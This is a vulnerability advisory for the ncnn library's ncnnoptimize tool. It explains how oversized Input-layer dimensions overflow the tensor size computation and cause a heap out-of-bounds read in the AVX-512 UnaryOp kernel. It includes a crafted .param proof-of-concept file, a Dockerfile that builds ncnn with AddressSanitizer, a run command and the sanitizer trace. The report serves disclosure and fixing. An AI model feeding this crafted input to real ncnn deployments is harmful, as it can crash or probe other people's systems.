Heap Out-of-Bounds Read in AVX-512 UnaryOp
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/unaryop_x86.cpp:70 in unary_op_inplace
Sanitizer verdict: unknown-crash
Summary
An attacker who can get ncnnoptimize to process a .param file controls the Input layer's w/h/d/c fields. Those four integers flow straight into Mat::create(), where the total-size computation wraps around and produces a 16-byte allocation for a tensor that the element loop still believes contains hundreds of thousands of floats. The AVX-512 UnaryOp kernel then streams 64-byte vector loads across that undersized heap block, aborting the optimizer. The entry point is ncnnoptimize <param> <bin> ..., whose ModelWriter::shape_inference() runs a real forward pass over the attacker-described input shape.
Detail
Input::load_param() reads w = pd.get(0, 0), h = pd.get(1, 0), d = pd.get(11, 0) and c = pd.get(2, 0) with no range check at all. ModelWriter::shape_inference() (tools/modelwriter.h:391) turns a four-dimensional Input into m.create(w, h, d, c), so the attacker directly picks the arguments of Mat::create. Inside that overload the per-channel stride cstep is computed in 64-bit size_t, but the product total() * elemsize that decides the malloc size is also size_t and simply wraps.
// src/mat.cpp:614
cstep = alignSize((size_t)w * h * d * elemsize, 16) / elemsize;
#if NCNN_BATCH
nstep = total();
#endif
size_t totalsize = alignSize(total() * elemsize, 4);
// src/layer/x86/unaryop_x86.cpp:59
int size = w * h * d * elempack;
#pragma omp parallel for num_threads(opt.num_threads)
for (int q = 0; q < channels; q++)
{
float* ptr = a.channel(q);
int i = 0;
#if __AVX512F__
for (; i + 15 < size; i += 16)
{
__m512 _p = _mm512_loadu_ps(ptr);
With the PoC's 0=4 1=43405 11=49477 2=2147418113, cstep evaluates to 4 * 43405 * 49477 = 8590196740. Multiplying that by c = 2147418113 inside total() overflows the 64-bit size_t and leaves exactly 4, so totalsize is 16 bytes and fastMalloc hands back the 84-byte region ASan reports (16 payload bytes plus the 4-byte refcount plus the fixed 64-byte NCNN_MALLOC_OVERREAD slack).
unary_op_inplace recomputes the element count in signed int: w * h * d * elempack is the same 8590196740, which truncates modulo 2^32 to 262148. The loop therefore issues 16388 unmasked _mm512_loadu_ps loads walking forward 64 bytes at a time from a buffer that only has 84 usable bytes; the second iteration already reads at offset 64 and runs off the end of the allocation, which is the READ of size 64 ASan reports. Nothing between the parameter parser and the kernel compares size or channels against the tensor's real capacity.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-avx-512-unaryop && cd ncnn-poc-heap-out-of-bounds-read-in-avx-512-unaryop
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
2 2
Input input 0 1 data 0=4 1=43405 11=49477 2=2147418113
UnaryOp unary 1 1 data output
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000140 at pc 0x575fb134b02f bp 0x7ffd20eb3830 sp 0x7ffd20eb3820
READ of size 64 at 0x50e000000140 thread T0
#0 0x575fb134b02e in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
#1 0x575fb134b02e in unary_op_inplace<ncnn::UnaryOp_x86_avx512_functor::unary_op_abs> /ncnn/build/src/layer/x86/unaryop_x86_avx512.cpp:70
#2 0x575fb134916f in ncnn::UnaryOp_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/unaryop_x86_avx512.cpp:122
#3 0x575fac70cfd8 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:711
#4 0x575fac6ffb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#5 0x575fac75f9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x575fac5f13c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x575fac66eeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x72a338edb1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x72a338edb28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x575fac5ee624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
#0 0x72a339554f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x575fac68368e in fastMalloc /ncnn/src/allocator.h:62
#2 0x575fac68368e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x575fac6c42f4 in ncnn::Mat::create(int, int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:623
#4 0x575fac6a811a in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:85
#5 0x575fac705a2d in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:640
#6 0x575fac6ffb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x575fac75f9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x575fac5f13c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x575fac66eeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x72a338edb1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x72a338edb28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x575fac5ee624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)
Credit
Zheng Yu @ DepthFirst